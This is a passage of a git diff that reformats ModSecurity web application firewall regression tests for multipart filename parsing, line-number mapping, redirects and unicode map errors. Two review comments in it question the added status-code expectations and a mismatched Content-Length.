boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -35,42 +35,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Target value: \"03CB1664.txt\" \\(Variable: MULTIPART_FILENAME" + "expected": { + "debug_log": "Target value: \"03CB1664.txt\" \\(Variable: MULTIPART_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (2/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (2/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -83,42 +88,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Target value: \"ab0-_xy.txt\" \\(Variable: MULTIPART_FILENAME" + "expected": { + "debug_log": "Target value: \"ab0-_xy.txt\" \\(Variable: MULTIPART_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (3/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (3/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -131,42 +141,47 @@ "----------------------------756b6d74fa1a8ee2--\r\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Warning: no filename= but filename*" + "expected": { + "debug_log": "Warning: no filename= but filename*", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (4/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (4/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -179,42 +194,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-16" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-16", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (5/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (5/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
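Review bot: The `"http_code": 200` added to the (4/7) expectation does not test anything by itself: the only rule visible for this case is the `pass` rule on `MULTIPART_FILENAME`, so the status stays 200 whether or not the parser rejected the Content-Disposition header, and the `debug_log` pattern carries the whole assertion. The (5/7) and (6/7) hunks have the same shape. If these cases are meant to pin how a malformed header is treated, a second rule on the parser error state, along the lines of the (7/7) case, e.g. `"SecRule REQBODY_ERROR \"!@eq 0\" \"id:2,phase:2,deny,status:403\""`, would surface it in the status code; the expected code then has to follow what the engine actually returns for these inputs. The request body of (4/7) lies outside this hunk.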
@@ -227,42 +247,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-17" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-17", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (6/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (6/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -275,42 +300,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-18" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-18", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (7/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (7/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", 
@@ -323,17 +353,20 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQBODY_ERROR \"!@eq 0\" \"id:1,phase:2,deny,status:403\"" ] } ] - diff --git a/test/test-cases/regression/issue-1831.json b/test/test-cases/regression/issue-1831.json index 773a0eec97..4f8366d947 100644 --- a/test/test-cases/regression/issue-1831.json +++ b/test/test-cases/regression/issue-1831.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 1", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,19 +27,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { - "debug_log": "\\\\xc2\\\\xa3" + "debug_log": "\\\\xc2\\\\xa3", + "http_code": 200 }, "rules": [ "SecRuleEngine On", 
@@ -51,7 +57,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 2", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,7 +70,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -74,16 +80,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 200 @@ -101,7 +112,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 3", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -114,7 +125,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -124,20 +135,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { - "http_code": 200, - "debug_log": "Target value: \"1\"" + "debug_log": "Target value: \"1\"", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -150,7 +166,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 4", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -163,7 +179,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -173,20 +189,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { - "http_code": 200, - "debug_log": "GLOBAL:alerted_970018_iisDefLoc with value: 1" + "debug_log": "GLOBAL:alerted_970018_iisDefLoc with value: 1", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -195,6 +216,3 @@ ] } ] - - - 
diff --git a/test/test-cases/regression/issue-1844.json b/test/test-cases/regression/issue-1844.json index 6ccb1f5e8a..01b6926ca6 100644 --- a/test/test-cases/regression/issue-1844.json +++ b/test/test-cases/regression/issue-1844.json 
@@ -1,279 +1,284 @@ [ { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (1/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (1/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"29\"" + "expected": { + "error_log": "line \"29\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test1\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (2/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (2/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"55\"" + "expected": { + "error_log": "line \"55\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test2\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (3/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (3/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"84\"" + "expected": { + "error_log": "line \"84\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (4/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (4/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test4" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"116\"" + "expected": { + "error_log": "line \"116\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test5" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"174\"" + "expected": { + "error_log": "line \"174\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (6/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (6/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test5" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"174\"" + "expected": { + "error_log": "line \"174\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/not-so-big-file.conf" ] } ] - diff --git a/test/test-cases/regression/issue-1850.json b/test/test-cases/regression/issue-1850.json index 75ac2bc5f6..9c67cf23f6 100644 --- a/test/test-cases/regression/issue-1850.json +++ b/test/test-cases/regression/issue-1850.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Override the default status code if not suitable to redirect action", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1850", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1850", "client": { "ip": "200.249.12.31", "port": 2313 
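Review bot: `"Content-Length": "27"` is left in all six cases of issue-1844.json, although cases 2/n to 6/n send a single 12-byte body line such as `param1=test2`. The harness change earlier in this series stops appending a newline to each body line, so nothing pads these bodies and the declared and actual lengths disagree; whether the engine consults the header is not visible from this hunk. In a WAF regression suite, a declared length that contradicts the body is best reserved for cases that test exactly that, so I would set it per case, e.g. `"Content-Length": "12",` for 2/n to 6/n. These header lines are context here, so the mismatch predates the reformatting.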
@@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,16 +27,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 302 diff --git a/test/test-cases/regression/issue-1941.json b/test/test-cases/regression/issue-1941.json index 0410ddad84..470c056a25 100644 --- a/test/test-cases/regression/issue-1941.json +++ b/test/test-cases/regression/issue-1941.json @@ -4,8 +4,35 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 1/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { + "http_code": 200, "parser_error": "Failed to locate the unicode map file from: does-not-exist-unicode.mapping" }, "rules": [ 
@@ -18,9 +45,36 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 2/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "parser_error": "Failed to locate the unicode map file from: um dois tres does-not-exist-unicode.mapping" + "http_code": 200, + "parser_error": "Failed to locate the unicode map file from: um dois tres does-not-exist-unicode.mapping" }, "rules": [ "SecRuleEngine On", @@ -32,9 +86,36 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 3/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "parser_error": "Invalid input: SecUnicodeMapFile does-not-exist-unicode.mapping eita" + "http_code": 